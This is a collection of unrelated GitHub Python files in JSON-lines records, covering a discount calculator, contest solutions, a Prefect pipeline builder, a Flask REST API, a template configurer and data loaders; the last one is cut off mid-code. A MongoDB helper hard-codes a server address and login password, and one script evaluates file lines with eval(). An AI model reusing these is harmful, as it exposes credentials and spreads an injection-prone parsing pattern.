diskon_10)\r\n print(sesudah_diskon)\r\n print(akhir)\r\n break\r\n elif peserta == \"Diamond\":\r\n if total_barang < 5:\r\n diskon = total_harga * (15/100)\r\n sesudah_diskon = total_harga - diskon\r\n print('Selamat! Anda mendapat potongam harga', diskon_15)\r\n print(sesudah_diskon)\r\n print(akhir)\r\n break\r\n else:\r\n diskon = total_harga * (20/100)\r\n sesudah_diskon = total_harga - diskon\r\n print('Selamat! Anda mendapat potongam harga', diskon_20)\r\n print(sesudah_diskon)\r\n print(akhir)\r\n break\r\n else:\r\n print('Masukkan tidak valid. Ulangi')\r\n continue\r\n else:\r\n print('Total harga yang harus anda bayar:', total_harga, \r\n \"\\n\" + akhir)","repo_name":"syifasukmaa/python","sub_path":"SIDAG/Tugas1_SI06_0110121102.py","file_name":"Tugas1_SI06_0110121102.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1533190390","text":"# team 159\n\nfrom sys import stdin\n\nN, M = [int(i) for i in stdin.readline().strip().split()]\n\nbadwords, answers = [], []\nequiv = {\n '0': 'O', \n '1': 'L', \n '2': 'Z', \n '3': 'E', \n '5': 'S', \n '6': 'B', \n '7': 'T', \n '8': 'B'\n}\n\nfor i in range(N):\n badwords.append(stdin.readline().strip())\nfor i in range(M):\n word = stdin.readline().strip()\n word = \"\".join(list(map(lambda x: equiv[x] if x in equiv else x, list(word))))\n hasBad = False\n for j in range(N):\n if badwords[j] in word:\n answers.append(\"INVALID\")\n hasBad = True\n break\n if not hasBad:\n answers.append(\"VALID\")\n\nfor i in answers:\n print(i)\n\n","repo_name":"sshamani/ICPC-ACM-Programming-Contest","sub_path":"Pacific North West - 2019/U.py","file_name":"U.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"27440696061","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"hcpa-biomed-processing\",\n version=\"1.0.2\",\n author=\"Rafael de Freitas\",\n author_email=\"dfr.rafael@gmail.com\",\n description=\"Apply color deconvolution and threshold on selected images\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/RafaelFreita/hcpa-image-processing\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires=\">=3.6\",\n install_requires=[\"numpy\", \"matplotlib\", \"Pillow\", \"scikit-image\", \"easygui\"],\n)","repo_name":"RafaelFreita/hcpa-image-processing","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72632116262","text":"import uuid\nfrom itertools import tee\n\nfrom hydra.data import ParallelData, Data\nfrom hydra.runners.base import Runner\nimport prefect\nimport cloudpickle\nfrom hydra.runners.shell import ShellRunner\n\nfrom hydra.tool import ExecuteCommand, Command\nfrom typing import List, Union, Dict\n\n\nclass TransformTicket:\n def __init__(self, id, transform, map=False, data=None, tasks=None):\n self.id = id\n self.data = data\n self.tasks = tasks\n self.transform = transform\n self.map = map\n\n\nclass PipelineBuilder:\n def __init__(self, name=None, pipeline=None, default_runner=ShellRunner):\n if not pipeline and not name:\n raise Exception(\"Must provide a name for the Pipeline\")\n if not pipeline:\n pipeline = Pipeline(name)\n\n self._pipeline = pipeline\n self._transform_flow = prefect.Flow(self._pipeline.name + \"_transforms\")\n self._lineage = {}\n self.default_runner = default_runner\n\n def add_command(self,\n data: Union[Data, ParallelData]=None,\n cmd: Command=None,\n runner: Runner=None,\n upstream_transforms: List=None,\n downstream_transforms: List=None,\n **kwargs):\n upstream_tasks = None\n downstream_tasks = None\n if upstream_transforms:\n upstream_tasks = [self._lineage[i.id].tasks for i in upstream_transforms]\n if downstream_transforms:\n downstream_tasks = [self._lineage[i.id].tasks for i in downstream_transforms]\n\n if not kwargs:\n kwargs = {}\n\n if data:\n kwargs.update(data.mapping)\n\n if not runner:\n runner = self.default_runner\n\n task = ExecuteCommand(runner=runner, command=cmd)\n\n task = self._pipeline.add_task(\n task, upstream_tasks=upstream_tasks, downstream_tasks=downstream_tasks, **kwargs)\n\n ticket = self._add_transform(task, upstream_transforms, downstream_transforms, **kwargs)\n ticket.map = False\n ticket.data = data\n ticket.tasks = task\n\n self._lineage[ticket.id] = ticket\n\n return ticket\n\n def map_command(self,\n data: Union[Data, ParallelData]=None,\n cmd: Command=None,\n runner: Runner=None,\n iterables: Dict=None,\n upstream_transforms: List=None,\n downstream_transforms: List=None,\n **kwargs):\n upstream_tasks = None\n downstream_tasks = None\n if upstream_transforms:\n upstream_tasks = [self._lineage[i.id].tasks for i in upstream_transforms]\n if downstream_transforms:\n downstream_tasks = [self._lineage[i.id].tasks for i in downstream_transforms]\n\n if not kwargs:\n kwargs = {}\n\n if not iterables:\n iterables = {}\n\n if data:\n iterables.update(data.mapping)\n\n if not runner:\n runner = self.default_runner\n\n task = ExecuteCommand(runner=runner, command=cmd)\n\n tasks = self._pipeline.map_task(\n task, iterables=iterables, upstream_tasks=upstream_tasks, downstream_tasks=downstream_tasks, **kwargs)\n\n keys = iterables.keys()\n kwargs.update(dict.fromkeys(keys))\n ticket = self._add_transform(task, upstream_transforms, downstream_transforms, **kwargs)\n ticket.map = True\n ticket.data = data\n ticket.tasks = tasks\n\n self._lineage[ticket.id] = ticket\n return ticket\n\n def _add_transform(self, task, upstream_transforms=None, downstream_transforms=None, **kwargs):\n upstream_tasks = None\n downstream_tasks = None\n if downstream_transforms:\n downstream_tasks = [i.transform for i in downstream_transforms]\n if upstream_transforms:\n upstream_tasks = [i.transform for i in upstream_transforms]\n with self._transform_flow as flow:\n result = task(**kwargs)\n if upstream_tasks or downstream_tasks:\n result.set_dependencies(upstream_tasks=upstream_tasks, downstream_tasks=downstream_tasks)\n ticket = TransformTicket(id=\"{name}-{id}\".format(name=task.name, id=uuid.uuid4()),\n transform=result)\n\n return ticket\n\n def add_task(self,\n task,\n data: Union[Data, ParallelData]=None,\n upstream_transforms: List=None,\n downstream_transforms: List=None,\n **kwargs):\n upstream_tasks = None\n downstream_tasks = None\n if upstream_transforms:\n upstream_tasks = [self._lineage[i.id].tasks for i in upstream_transforms]\n if downstream_transforms:\n downstream_tasks = [self._lineage[i.id].tasks for i in downstream_transforms]\n\n if not kwargs:\n kwargs = {}\n\n if data:\n kwargs.update(data.mapping)\n\n task = self._pipeline.add_task(\n task, upstream_tasks=upstream_tasks, downstream_tasks=downstream_tasks, **kwargs)\n\n ticket = self._add_transform(task, upstream_transforms, downstream_transforms, **kwargs)\n ticket.map = False\n ticket.data = data\n ticket.tasks = task\n\n self._lineage[ticket.id] = ticket\n\n return ticket\n\n def map_task(self,\n task,\n data: Union[Data, ParallelData]=None,\n iterables: Dict=None,\n upstream_transforms=None,\n downstream_transforms=None,\n **kwargs):\n upstream_tasks = None\n downstream_tasks = None\n if upstream_transforms:\n upstream_tasks = [self._lineage[i.id].tasks for i in upstream_transforms]\n if downstream_transforms:\n downstream_tasks = [self._lineage[i.id].tasks for i in downstream_transforms]\n\n if not kwargs:\n kwargs = {}\n\n if not iterables:\n iterables = {}\n\n if data:\n iterables.update(data.mapping)\n\n tasks = self._pipeline.map_task(task, iterables, upstream_tasks, downstream_tasks, **kwargs)\n\n kwargs.update(iterables)\n ticket = self._add_transform(task, upstream_transforms, downstream_transforms, **kwargs)\n ticket.map = True\n ticket.data = data\n ticket.tasks = tasks\n\n self._lineage[ticket.id] = ticket\n return ticket\n\n def visualize_transforms(self):\n self._transform_flow.visualize()\n\n def visualize_tasks(self):\n self._pipeline.visualize()\n\n\nclass Pipeline:\n def __init__(self, name):\n self.name = name\n self._flow = prefect.Flow(name)\n\n def run(self, state=None, **kwargs):\n state = self._flow.run(**kwargs)\n with open(\"result.hydra\", \"wb\") as f:\n cloudpickle.dump(state, f)\n return state\n\n def add_task(self,\n task: prefect.Task = None,\n upstream_tasks: List=None,\n downstream_tasks: List=None,\n **kwargs) -> TransformTicket:\n \"\"\" \"\"\"\n with self._flow as f:\n result = task(**kwargs)\n if upstream_tasks or downstream_tasks:\n result.set_dependencies(upstream_tasks=upstream_tasks, downstream_tasks=downstream_tasks)\n return result\n\n\n def map_task(self, task, iterables: Dict=None, upstream_tasks=None, downstream_tasks=None, **kwargs):\n\n keys = list(iterables.keys())\n if len(keys) > 1:\n collections = list(iterables.values())\n collections = zip(*collections)\n elif len(keys) == 1:\n collections = list(*iterables.values())\n results = []\n with self._flow as flow:\n for i, data in enumerate(collections):\n params = dict.fromkeys(keys)\n for k, key in enumerate(keys):\n params[key] = data[k]\n if kwargs:\n params.update(kwargs)\n\n result = task(**params)\n if upstream_tasks:\n result.set_dependencies(upstream_tasks=[tasks[i] for tasks in upstream_tasks])\n if downstream_tasks:\n result.set_dependencies(downstream_tasks=[tasks[i] for tasks in downstream_tasks])\n results.append(result)\n return results\n\n\n def visualize(self):\n self._flow.visualize()\n\n","repo_name":"kforti/Hydra","sub_path":"hydra/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":8509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"26649203907","text":"import sqlite3\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required\n\nclass Item(Resource):\n # used for controlling the input argument from the api request.\n # it allows only required arg to pass through.\n parser = reqparse.RequestParser()\n parser.add_argument('price',type=float,required=True,help=\"This field cannot be left blank!\")\n parser.add_argument('quantity',type=str,required=True,help=\"This field cannot be left blank!\")\n\n\n @classmethod\n def find_by_name(cls,name):\n connection = sqlite3.Connection(\"data.db\")\n cursor = connection.cursor()\n\n query = \"SELECT * FROM items WHERE name=?\"\n result = cursor.execute(query,(name,))\n row = result.fetchone()\n connection.close()\n\n if row:\n return{'item':{'name':row[0],'price':row[1],'quantity':row[2]}}\n\n # require authentication inorder to continue with the below request.\n @jwt_required()\n def get(self,name):\n item = self.find_by_name(name)\n if item:\n return item\n return{'message':\"Item not found\"},404\n \n \n def post(self,name):\n\n if self.find_by_name(name):\n return {'Message':f\"This item {name} is already exist\"},400\n\n requestData = Item.parser.parse_args()\n newItem = {\n 'name' : name,\n 'price' : requestData['price'],\n 'quantity' : requestData['quantity']\n }\n try:\n self.insert(newItem)\n except:\n return {\"message\":\"An error occured while trying to insert an item in DB\"},500\n return f\"{newItem} is successfully added to the list\",201\n\n @classmethod\n def insert(cls,item):\n connection = sqlite3.connect('data.db')\n cursor = connection.cursor()\n\n query = \"INSERT INTO items VALUES(?,?,?)\"\n cursor.execute(query,(item['name'],item['price'],item['quantity']))\n\n connection.commit()\n connection.close()\n\n\n def delete(self,name):\n connection = sqlite3.connect('data.db')\n cursor = connection.cursor()\n\n query = \"DELETE FROM items WHERE name=?\"\n cursor.execute(query,(name,))\n\n connection.commit()\n connection.close()\n \n return f\"Item {name} is deleted from DB\"\n\n def put(self,name):\n data = Item.parser.parse_args()\n\n item = self.find_by_name(name)\n updated_item={\"name\":name,\"price\":data['price'],\"quantity\":data['quantity']}\n if item is None :\n try:\n self.insert(updated_item)\n except:\n return {\"message\":\"Error while trying to insert data into DB\"},500\n else:\n try:\n self.update(updated_item)\n except:\n return {\"message\":\"Error while trying to update data into DB\"},500\n\n return updated_item\n\n @classmethod\n def update(cls,item):\n connection = sqlite3.connect('data.db')\n cursor = connection.cursor()\n\n query = \"UPDATE items SET price=?,quantity=? WHERE name=?\"\n cursor.execute(query,(item['price'],item['quantity'],item['name']))\n\n connection.commit()\n connection.close()\n\n\n\nclass ItemList(Resource):\n def get(self):\n connection = sqlite3.connect('data.db')\n cursor = connection.cursor()\n\n query = \"SELECT * FROM items\"\n result = cursor.execute(query)\n\n item = []\n for row in result:\n item.append({\"name\":row[0],\"price\":row[1],\"quantity\":row[2]})\n\n connection.close()\n return {\"item\":item}\n\n ","repo_name":"NavinAJ/FlaskRepository","sub_path":"code/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22461788598","text":"from os import environ\nfrom os.path import join\n\nIN_DOCKER_ENV_VARS = [\n \"CPP_DOCKER\",\n \"FAASM_DOCKER\",\n]\n\n\ndef in_docker():\n \"\"\"\n Work-out wether we are being called from inside a docker container\n\n faasmctl can be invoked both from outside and inside a docker container.\n When invoked from inside a docker container, faasmctl can only be used to\n interact with a cluster running on docker compose. In that case, we need to\n use a different IP for the services in the cluster. Fortunately, Faasm\n sets certain env. vars when running inside a container. This function\n checks for them and returns True if successful\n \"\"\"\n for env_var in IN_DOCKER_ENV_VARS:\n if env_var in environ and environ[env_var] == \"on\":\n return True\n\n return False\n\n\ndef get_docker_tag(faasm_checkout, image_name):\n \"\"\"\n Given an image name, get the docker tag from the `.env` file in Faasm's\n source\n\n Parameters:\n - faasm_checkout (str): path to the local checkout of Faasm\n - image_name (str): image name to find. Must be one in\n {CPP,FAASM,PYTHON}_CLI_IMAGE\n\n Returns:\n - A string with the corresponding docker image tag\n \"\"\"\n env_file_path = join(faasm_checkout, \".env\")\n with open(env_file_path, \"r\") as fh:\n env_file = fh.readlines()\n env_file = [line.strip() for line in env_file]\n\n # Get the actual image tag by finding the right line in the file. We are\n # unncesserily loading all the lines, but we don't care\n image_tag = [line.split(\"=\")[1] for line in env_file if line.startswith(image_name)]\n assert len(image_tag) == 1\n image_tag = image_tag[0]\n\n return image_tag\n","repo_name":"faasm/faasmctl","sub_path":"faasmctl/util/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"41969464071","text":"import ast\n\n# su=[ast.literal_eval(i) for i in open('su.txt','r')]#解析数据\nsu = [eval(i) for i in open('su.txt', 'r')] # 解析数据\n\n\ndef xian():\n # 显示全部\n print('*' * 50)\n n = 0\n for i in su:\n print(str(n) + '__' + str(i))\n n += 1\n # print('\\n'.join([str(o) for o in su]))#显示全部\n print('*' * 50)\n\n\ndef xie(name, pwd):\n # 增加账号\n name = name\n pwd = pwd\n f = open('su.txt', 'a')\n f.write(str({'nid': len(su), 'name': name, 'pwd': pwd})) # 写入数据\n f.write('\\n')\n su.append({'nid': str(len(su)), 'name': name, 'pwd': pwd})\n\n\ndef cha(name):\n # 查密码\n for i in su:\n if i['name'] == name:\n return i['pwd']\n\n\ndef genxin():\n # 对数据删除改证,后更新到txt\n f = open('su.txt', 'w')\n f = open('su.txt', 'a')\n for i in su:\n f.write(str(i) + '\\n')\n print('更新成功')","repo_name":"liu100286/pyqt5_zp","sub_path":"存储/HUAISQL.py","file_name":"HUAISQL.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5606630494","text":"#! /usr/bin/python3\n\nimport argparse\nimport configparser\nimport os\nimport re\nimport stat\nimport subprocess\nimport sys\n\n\nLOG_WARNINGS = True\n\nARG_CONFIG_FILE = 'config_file'\nARG_TEMPLATES_DIR = 'templates_dir'\nARG_REFRESH_SCRIPT = 'refresh_script'\n\nC_ = '\\033[0m'\nC_RED = '\\033[31m'\nC_YELLOW = '\\033[33m'\n\ndef print_message(level, msg, suffix, out_file=sys.stdout):\n print('{}: {}. {} ...'.format(level, msg, suffix), file=out_file)\n\ndef quit(msg, *args):\n print_message('{}ERROR{}'.format(C_RED, C_), msg.format(*args), 'Quitting', sys.stderr)\n exit(1)\n\ndef warn(msg, *args):\n LOG_WARNINGS and print_message('{}WARNING{}'.format(C_YELLOW, C_), msg.format(*args), 'Skipping')\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-c', '--' + ARG_CONFIG_FILE, default='./theme_config.ini', help='config INI file used for template substitutions')\n parser.add_argument('-t', '--' + ARG_TEMPLATES_DIR, default='./templates/', help='directory containing templates to configure')\n parser.add_argument('-r', '--' + ARG_REFRESH_SCRIPT, help='refresh script to run after distributing templates to allow for changes to take effect')\n parser.add_argument('-q', '--quiet', action='store_true', help='suppress warnings (will still show errors)')\n args = parser.parse_args()\n global LOG_WARNINGS\n if args.quiet: LOG_WARNINGS = False\n return vars(args)\n\ndef load_config(filename):\n try:\n parser = configparser.ConfigParser(interpolation=configparser.ExtendedInterpolation())\n return parser.read(filename) and parser\n except: return None\n\ndef get_template_files(templates_dirname):\n try: return map(lambda f: os.path.join(templates_dirname, f), os.listdir(templates_dirname))\n except: return None\n\ndef load_template(template_filename):\n try:\n with open(template_filename, 'r') as f:\n template_lines = f.readlines()\n if not template_lines: return (None, None)\n\n params = {}\n i = 0\n line = template_lines[i].strip()\n while not all(c == '-' for c in line):\n (param_name, param_data) = re.split('\\s*=\\s*', line)\n params[param_name] = param_data\n i += 1\n line = template_lines[i].strip()\n template = ''.join(template_lines[i+1:])\n return (template, params)\n except: return (None, None)\n\ndef required_params_present(params):\n REQUIRED_TEMPLATE_PARAMS = ['destination', 'executable']\n POSITIVES=['true', 'y', 'yes', '1']\n if not all(param_name in params for param_name in REQUIRED_TEMPLATE_PARAMS): return False\n\n params['executable'] = any(val == params['executable'].lower() for val in POSITIVES)\n return True\n\ndef replace_placeholders_with_data(template, data):\n try:\n return re.sub(r'{{(\\w*?):(\\w*?)}}', lambda m: data[m.group(1)][m.group(2)], template)\n except KeyError as e: return None\n\ndef make_file_executable(filename):\n try: os.chmod(filename, os.stat(filename).st_mode | stat.S_IEXEC)\n except: return None\n\ndef save_configured_resource(resource_str, destination, make_executable=False):\n destination = destination.replace('~', os.path.expanduser('~'))\n os.makedirs(os.path.dirname(destination), exist_ok=True)\n with open(destination, 'w') as fout:\n fout.write(resource_str)\n make_executable and make_file_executable(destination)\n\ndef refresh(refresh_script):\n try:\n refresh_script and subprocess.call(refresh_script)\n return True\n except: return None\n\ndef main():\n args = parse_arguments()\n\n theme_config = load_config(args[ARG_CONFIG_FILE])\n not theme_config and quit(\"Invalid config file '{}'\", args[ARG_CONFIG_FILE])\n\n template_files = get_template_files(args[ARG_TEMPLATES_DIR])\n not template_files and quit(\"Invalid templates dir '{}'\", args[ARG_TEMPLATES_DIR])\n\n for template_filename in template_files:\n (template, params) = load_template(template_filename)\n if template and required_params_present(params):\n themed_res = replace_placeholders_with_data(template, theme_config)\n if themed_res:\n save_configured_resource(themed_res, params['destination'], params['executable'])\n else: warn(\"Invalid placeholder found in template '{}'\", template_filename)\n else: warn(\"Invalid or malformed parameters in template '{}'\", template_filename)\n\n if args[ARG_REFRESH_SCRIPT]:\n not refresh(args[ARG_REFRESH_SCRIPT]) and warn(\"Failed to reload using script '{}'\", args[ARG_REFRESH_SCRIPT])\n else:\n warn(\"No reload script specified. Please reload any necessary changes manually\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"sshashank124/configurer","sub_path":"configurer.py","file_name":"configurer.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5606297048","text":"from pymongo import MongoClient\nimport re\n\n\ndef find(query):\n# uri = 'mongodb://logstash:depo2012@172.30.161.20:19332/'\n client = MongoClient('172.30.161.20', 19332)\n db = client['elk']\n db.authenticate('logstash', 'depo2012')\n data = db['data']\n res = data.find(query)\n return(res)\n\n\ndef preparResult(result, field_res):\n res = {}\n pattern = re.compile(\"\")\n for field in field_res:\n if field == \"\":\n res.update({\"\": result.count()})\n else:\n res.update({pattern.findall(field)[0]: []})\n\n for col in result:\n for field in field_res:\n try:\n if pattern.findall(field)[0] in col.keys():\n res[pattern.findall(field)[0]].append(col[pattern.findall(field)[0]])\n except IndexError:\n pass\n with open('exp.txt', 'a+') as f:\n f.write(str(res))\n return(res)\n\n\ndef resultMongo(query, result_final, field_res, in_chain, command):\n if command == 'find':\n result = find(query)\n result_dict = preparResult(result, field_res)\n result_final[int(in_chain)] = result_dict\n","repo_name":"etunko/elkSender","sub_path":"mailWorker/mongoReq.py","file_name":"mongoReq.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26961222394","text":"#!/usr/bin/python \n# coding:utf-8 \n\n\"\"\" \n@author: Yong Li \n@contact: liyong@cobotsys.com\n@software: PyCharm \n@file: basic_func.py \n@time: 18-8-7 下午7:19\n1. Cell phone图像与模板图像对齐\n2. 清空文件夹下所有的文件\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport os\n# from skimage.measure import label, regionprops\n\nimport random\nimport shutil\n# import lmdb\nimport sys\n\n\n# ---获取路径下所有文件函数------------------------------------------------------------------------------------------------\ndef get_all_files(root):\n output = []\n for roots, dir, files in os.walk(root, followlinks=True):\n for short_name in files:\n output = output + [os.path.join(roots, short_name)[len(root) + 1:]]\n # for dir_name in dir:\n # output = output + get_all_files(os.path.join(roots, dir_name))\n return output\n\n\n# ---测试get_all_files函数-----------------------------------------------------------------------------------------------\ndef test_get_all_files():\n root = \"/media/yong/data/test/yong\"\n print(get_all_files(root))\n\n\n# 清空文件函数\ndef del_file(path):\n ls = os.listdir(path)\n for i in ls:\n c_path = os.path.join(path, i)\n if os.path.isdir(c_path):\n del_file(c_path)\n else:\n os.remove(c_path)\n\n\nif __name__ == \"__main__\":\n pass\n # test_image_correct()\n # test_get_all_files()\n","repo_name":"fx19940824/DetectionModel","sub_path":"TrainerDL/Projects/Mobile_Phone/ctools/basic_func.py","file_name":"basic_func.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"8868842000","text":"class Solution:\n def removeDuplicates(self, nums) -> int:\n #Approach 1: Time Complexity - O(N) and Space Complexity - O(1)\n if len(nums) == 0:\n return 0\n cnt = 0\n for i in range(1, len(nums)):\n if nums[i] != nums[cnt]:\n cnt += 1\n nums[cnt] = nums[i]\n return cnt + 1\n\n #Approach 2: Time Complexity - O(N) and Space Complexity - O(N)\n '''\n nums[:] = sorted(set(nums))\n return len(nums)\n '''\n\nif __name__ == \"__main__\":\n nums = [1,1,2]\n print(Solution().removeDuplicates(nums))\n print(nums)","repo_name":"VarunBhattacharya/LeetcodePythonSolutions","sub_path":"26_Remove_Duplicates_From_Sorted_Array.py","file_name":"26_Remove_Duplicates_From_Sorted_Array.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38699357622","text":"c_ans = input()\ns_ans = input()\n\nsum = 0\nif(len(c_ans) == len(s_ans)):\n for i in range(len(c_ans)):\n if(s_ans[i] == c_ans[i]):\n sum += 1\n print(sum)\nelse:\n print(\"Incomplete answer\")\n\n","repo_name":"KanakornMek/2190101-com-prog","sub_path":"04_Loop_03.py","file_name":"04_Loop_03.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14155404881","text":"#Initial code for setup in GitHub\n\nimport os\nimport csv\ncsvpath = os.path.join('budget_data.csv')\n# First column is (Date). Second column is (Profit/Losses)\n\ntotal_months = 0\nprev_revenue = 0\nmonth_of_change = []\nrevenue_change_list = []\ngreatest_increase = [\"\",0]\ngreatest_decrease = [\"\",999999999999]\ntotal_revenue = 0\n\nwith open(csvpath) as csvfile:\n csvreader = csv.DictReader(csvfile)\n \n for row in csvreader:\n\n #total months\n total_months = total_months + 1\n #total_revenue. The DictReader allows to read to column header from file. Found this a helpful to align with file/data\n total_revenue = total_revenue + int(row[\"Profit/Losses\"])\n \n #Calculate the revenue change\n revenue_change = int(row['Profit/Losses']) - prev_revenue\n prev_revenue = int(row['Profit/Losses'])\n revenue_change_list = revenue_change_list + [revenue_change]\n month_of_change = month_of_change + [row['Date']]\n\n #Calculate greatest increase\n if (revenue_change > greatest_increase[1]):\n greatest_increase[0] = row['Date']\n greatest_increase[1] = revenue_change\n \n #Calculate greatest decrease\n if (revenue_change < greatest_decrease[1]):\n greatest_decrease[0] = row['Date']\n greatest_decrease[1] = revenue_change\n\n#Calculate the average revenue change. Note that change list includes first line. To calculate total shown in module 3,\n#remove the first data row and alter the number of months. Another solution is to do If statement where month >1\n\n#revenue_avg = sum(revenue_change_list)/ len(revenue_change_list)\nrevenue_avg = (sum(revenue_change_list) - 1088983 ) / 85\n\n#Create output statement. Found this very helpful and easier to format than doing each individual print statements\noutput = (\n f\"\\nFinancial Analysis\\n\"\n f\"------------------------\\n\"\n f\"Total Months: {total_months}\\n\"\n f\"Total Revenue: ${total_revenue}\\n\"\n f\"Average Revenue Change: ${revenue_avg}\\n\"\n f\"Greatest Increase in Revenue: {greatest_increase[0]} (${greatest_increase[1]})\\n\"\n f\"Greatest Decrease in Revenue: {greatest_decrease[0]} (${greatest_decrease[1]})\\n\"\n)\n\nprint(output)\n\n#Print screen to see the revenue changes. \n#print(revenue_change_list)\n\n#Export results to text file\noutput_path = os.path.join(\"..\", \"Analysis\", \"financial_analysis.csv\")\nwith open(output_path, \"w\") as txt_file:\n txt_file.write(output)","repo_name":"jjmoreland/python-challenge","sub_path":"PyBank/Resources/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74042147939","text":"def isPalindrome(n):\n \n n = str(n)\n last = len(n) - 1\n \n for index in range(0, int(len(n) / 2)):\n if(n[index] != n[last - index]):\n return False\n \n return True\n\nmaxPalindrome = -1\n\nfor n1 in range(999, 99, -1):\n for n2 in range(999, 99, -1):\n n3 = n1 * n2\n if isPalindrome(n3):\n if n3 > maxPalindrome:\n maxPalindrome = n3\n\nprint(maxPalindrome)","repo_name":"AndiProg/ProjectEuler_Python","sub_path":"ProjectEuler_Python/0004.py","file_name":"0004.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36818649503","text":"# Exercise 2: Write a program to look for lines of the form:\n\n# New Revision: 39772\n# Extract the number from each of the lines using a regular expression and the findall() method. Compute the average of the numbers and print out the average as an integer.\n\n# Enter file:mbox.txt\n# 38549\n\n# Enter file:mbox-short.txt\n# 39756\n\nimport re\n\nuserInput = input('Enter file: ')\nfileHandle = open(userInput)\n\nlines = fileHandle.read()\nrevisions = re.findall('New Revision:\\s([0-9]+)', lines)\n\ntotal = 0\nfor revision in revisions:\n total = total + int(revision)\n\naverage = int(total/len(revisions))\n\nprint(average)","repo_name":"PeaWarrior/learn-py","sub_path":"ex_11/ex_11_02.py","file_name":"ex_11_02.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"3178467106","text":"import turtle\r\nimport random\r\n\r\nwn = turtle.Screen() \r\ntmnt = turtle.Turtle()\r\ntmnt.shape(\"turtle\")\r\ncolours = [\"cyan\", \"purple\", \"white\", \"blue\"]\r\ntmnt.color(\"cyan\")\r\ntmnt.pensize(2)\r\nwn.bgcolor(\"grey\")\r\n\r\n\r\ntmnt.penup()\r\ntmnt.forward(90)\r\ntmnt.left(45)\r\ntmnt.pendown()\r\n\r\ndef branch():\r\n for i in range(3):\r\n for i in range(3):\r\n tmnt.forward(30)\r\n tmnt.backward(30)\r\n tmnt.right(45)\r\n tmnt.left(90)\r\n tmnt.backward(30)\r\n tmnt.left(45)\r\n tmnt.right(90)\r\n tmnt.forward(90)\r\n\r\nfor i in range(8):\r\n branch()\r\n tmnt.left(45)\r\n tmnt.color(random.choice(colours))\r\n\r\n#for i in range(20): #first snowflake\r\n #for i in range(2):\r\n #tmnt.forward(150)\r\n #tmnt.right(160)\r\n #tmnt.forward(100)\r\n #tmnt.left(140)\r\n #tmnt.forward(150)\r\n #tmnt.right(145)\r\n #tmnt.forward(25)\r\n #tmnt.left(120)\r\n #tmnt.forward(25)\r\n #tmnt.right(140)\r\n #tmnt.forward(150)\r\n #tmnt.right(32)\r\n #tmnt.color(random.choice(colours))\r\n\r\nwn.mainloop()\r\n","repo_name":"MerrimaT/cti110","sub_path":"P4LAB2c_Merriman.py","file_name":"P4LAB2c_Merriman.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37413205","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nfrom PIL import Image, ImageOps\nimport numpy as np\n\ndef load_image(normalize=True, to_gray_scale=True):\n train_table = pd.read_table('./signate_画像10種類/train_master.tsv')\n \n# print(train_table.label_id)\n# print(train_table.file_name)\n x_train = []\n t_train = []\n x_test = []\n t_test = []\n counter = [0,0,0,0,0,0,0,0,0,0]\n print('loading...')\n for row in train_table.itertuples():\n img = Image.open('./signate_画像10種類/train_images/'+str(row.file_name))\n if to_gray_scale:\n img = ImageOps.grayscale(img)\n #画像を保存\n \n np_img = np.array(img, dtype=np.float32)\n flatten_image = np_img.flatten()\n# flatten_image /= 255\n \n #標準化 詳しくはこちらhttps://deepage.net/features/numpy-normalize.html\n if normalize:\n flatten_image = normalizer(flatten_image)\n \n \n counter[row.label_id] += 1\n \n if counter[row.label_id]%5 == 0:\n x_test.append(flatten_image)\n t_test.append(row.label_id)\n else:\n 